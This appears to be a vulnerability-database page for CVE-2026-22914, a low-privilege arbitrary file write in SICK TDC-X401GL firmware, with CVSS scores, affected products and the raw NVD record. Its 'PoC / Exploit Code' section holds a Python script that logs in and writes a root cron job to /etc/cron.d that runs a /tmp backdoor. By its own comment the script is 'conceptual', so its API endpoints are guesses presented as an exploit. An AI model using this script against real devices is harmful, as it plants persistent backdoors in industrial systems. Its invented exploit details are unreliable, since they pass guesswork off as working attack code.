Security Vulnerability Report
中文
CVE-2026-22914 CVSS 4.3 MEDIUM

CVE-2026-22914

Published: 2026-01-15 13:16:06
Last Modified: 2026-01-23 15:27:46
Source: [email protected]

Description

An attacker with limited permissions may still be able to write files to specific locations on the device, potentially leading to system manipulation.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK SICK设备特定版本(具体版本需参考官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22914 PoC - SICK Device Arbitrary File Write # Note: This is a conceptual PoC based on vulnerability description # Requires authentication with low-privilege account import requests import sys TARGET_HOST = "https://target-device.local" USERNAME = "low_priv_user" PASSWORD = "password" TARGET_PATH = "/etc/cron.d/malicious_script" def exploit_cve_2026_22914(): """ Exploit for arbitrary file write vulnerability in SICK devices. The vulnerability allows authenticated users with low privileges to write files to arbitrary locations on the device. """ # Authentication session = requests.Session() login_data = { 'username': USERNAME, 'password': PASSWORD } # Login to obtain session login_url = f"{TARGET_HOST}/api/login" response = session.post(login_url, json=login_data) if response.status_code != 200: print(f"[-] Authentication failed") return False print(f"[+] Successfully authenticated") # File write payload malicious_content = "#!/bin/bash\n# Malicious cron job\n* * * * * root /tmp/backdoor.sh" # Exploit the arbitrary file write vulnerability # Target specific file writing endpoint write_url = f"{TARGET_HOST}/api/file/write" exploit_data = { 'path': TARGET_PATH, 'content': malicious_content, 'overwrite': True } response = session.post(write_url, json=exploit_data) if response.status_code == 200: print(f"[+] File successfully written to {TARGET_PATH}") print(f"[+] System may now be compromised") return True else: print(f"[-] Exploitation failed: {response.status_code}") return False if __name__ == "__main__": print("CVE-2026-22914 PoC - SICK Device Arbitrary File Write") exploit_cve_2026_22914()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22914", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:06.250", "lastModified": "2026-01-23T15:27:45.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker with limited permissions may still be able to write files to specific locations on the device, potentially leading to system manipulation."}, {"lang": "es", "value": "Un atacante con permisos limitados aún podría ser capaz de escribir archivos en ubicaciones específicas en el dispositivo, potencialmente llevando a la manipulación del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "59BB5012-A895-4A93-B36F-A062A9389DB1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.